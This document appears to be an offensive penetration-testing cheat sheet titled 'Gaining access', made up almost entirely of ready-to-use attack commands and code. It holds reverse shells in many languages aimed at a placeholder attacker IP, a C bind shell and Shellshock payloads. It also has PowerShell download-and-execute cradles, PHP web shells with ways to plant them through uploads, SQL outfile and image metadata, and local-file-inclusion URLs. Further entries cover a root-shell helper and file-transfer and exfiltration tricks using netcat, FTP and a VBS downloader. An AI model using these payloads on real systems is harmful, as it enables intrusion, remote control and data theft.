Gaining access

bash -i >& /dev/tcp/x.x.x.x/6969 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

/bin/sh -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",6969));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

perl -e 'use Socket;$i="x.x.x.x";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:6969");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php -r '$sock=fsockopen("x.x.x.x",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh x.x.x.x 6969
nc -e cmd.exe x.x.x.x 6969
/bin/sh | nc x.x.x.x 6969
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 6969 0/tmp/p

rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 6969 0/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/6969;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

() { :; }; /bin/bash -c 'whoami'

() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/6969 0>&1;'

Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6969

# from cmd
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

# PowerShell
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

// gcc reverse.c -o reverse

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
  int scktd;
  struct sockaddr_in client;

  client.sin_family = AF_INET;
  client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
  client.sin_port = htons(6969); // attacker port

  scktd = socket(AF_INET,SOCK_STREAM,0);
  connect(scktd,(struct sockaddr *)&client,sizeof(client));

  dup2(scktd,0); // STDIN
  dup2(scktd,1); // STDOUT
  dup2(scktd,2); // STDERR

  execl("/bin/sh","sh","-i",NULL,NULL);

  return 0;
}

// gcc bind.c -o bind

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
  int scktd = -1;
  int scktd_client = -1;
  int i = -1;
  struct sockaddr_in server;
  struct sockaddr_in client;
  
  scktd = socket(AF_INET,SOCK_STREAM,0);
  if (scktd == -1)
    return -1;

  server.sin_family = AF_INET;
  server.sin_addr.s_addr = INADDR_ANY;
  server.sin_port = htons(6969); // local listening port

  if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
    return -2;

  listen(scktd,3);
  i = sizeof(struct sockaddr_in);
  scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
  if (scktd_client < 0)
    return -3;

  dup2(scktd_client,0); // STDIN
  dup2(scktd_client,1); // STDOUT
  dup2(scktd_client,2); // STDERR
 
  execl("/bin/sh","sh","-i",NULL,NULL);

  return 0;
}

<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>

<?php system("/usr/local/bin/wget http://x.x.x.x:6969/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>

SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"

http://x.x.x.x/blah?parameter=/etc/passwd%00

http://x.x.x.x/blah?parameter=php://input%00

<? phpinfo(); ?>

<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>

curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"

curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php

exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' hodor.jpeg
exiftool "-comment<=shell.php" hodor.png

int main(void){
     setresuid(0, 0, 0);
     system("/bin/bash");
 }

python -m SimpleHTTPServer

python -m SimpleHTTPServer 8001

wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py

(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:6969/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start

echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt

apt-get install python-pyftpdlib  

python -m pyftpdlib -p 21

ftp x.x.x.x
get nc.exe

nc.exe -nv x.x.x.x 6969 -e cmd.exe 
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 6969

rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://x.x.x.x/file.exe file.exe

wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt

nc -lvp 6969 > blah.txt

nc x.x.x.x 6969 < blah.txt

cat blah.txt | nc x.x.x.x 6969

python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py